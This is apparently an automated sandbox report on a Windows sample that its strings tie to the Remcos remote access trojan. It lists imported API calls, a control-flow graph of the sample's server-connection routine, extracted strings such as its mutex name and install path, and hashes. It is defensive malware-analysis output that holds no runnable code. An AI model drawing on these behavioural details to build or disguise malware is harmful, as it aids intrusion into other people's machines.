                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                  • atoi.MSVCRT ref: 00409540
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                    • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                    • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409A81
                                    • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00409ACC
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                    • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                    • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                  • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\logagent.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                  • API String ID: 1672879135-1489423779
                                  • Opcode ID: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                  • Opcode Fuzzy Hash: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C81C Relevance: 251.0, APIs: 135, Strings: 8, Instructions: 764sleepnetworkthreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 250 40c81c-40c867 call 412407 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 255 40c876-40c8b0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 4129eb 250->255 256 40c869-40c870 Sleep 250->256 261 40c8b5-40c8fa call 402038 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 4129eb 255->261 256->255 268 40c909-40c981 call 40180c * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 41203b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 261->268 269 40c8fc-40c907 call 401838 261->269 275 40c987-40c9a9 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ gethostbyname 268->275 269->268 269->275 281 40d25a-40d26b call 401838 275->281 282 40c9af-40c9fc call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi htons call 401838 275->282 288 40d299-40d2a1 call 4017dd 281->288 289 40d26d-40d293 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi Sleep 281->289 294 40ca34-40ca3e ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 282->294 295 40c9fe-40ca32 call 40180c ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 402fb6 282->295 288->261 289->288 297 40ca44-40ca5e call 40209b 294->297 295->297 304 40ca64-40cb99 call 40180c * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 41203b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 402580 call 4122eb sprintf ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z _itoa call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 call 40b692 297->304 305 40d258 297->305 320 40cbab-40cbb6 304->320 321 40cb9b-40cba5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 304->321 305->281 322 40cbb8-40cbba 320->322 323 40cbbd-40d1c3 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z call 412855 call 412718 call 40180c GetTickCount call 412718 call 41269b call 412718 call 412660 call 412855 * 5 call 409e7d call 412855 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 9 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 9 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 5 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 10 call 4020c2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 44 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ call 402149 320->323 321->320 322->323 356 40d1c8-40d1d1 323->356 357 40d1d3-40d1da 356->357 358 40d1e5-40d1ec 356->358 357->358 361 40d1dc-40d1de 357->361 359 40d1f8-40d234 call 402f93 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z * 2 call 41203b 358->359 360 40d1ee-40d1f3 call 405cca 358->360 368 40d246-40d252 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 359->368 369 40d236-40d240 CreateThread 359->369 360->359 361->358 368->305 369->368
                                  APIs
                                    • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,761B43E0,0041BCB0,00000000), ref: 00412492
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,761B43E0,0041BCB0,00000000), ref: 0040C83F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                  • atoi.MSVCRT ref: 0040C85C
                                  • Sleep.KERNEL32(00000000), ref: 0040C870
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                  • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                  • atoi.MSVCRT ref: 0040C9DE
                                  • htons.WS2_32(00000000), ref: 0040C9E6
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                  • sprintf.MSVCRT ref: 0040CB14
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                  • _itoa.MSVCRT ref: 0040CB37
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00409E7D: GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro), ref: 00409E8E
                                    • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe,?), ref: 0040CBCC
                                  • GetTickCount.KERNEL32 ref: 0040CC20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro,0041B310,00000000), ref: 0040CD07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
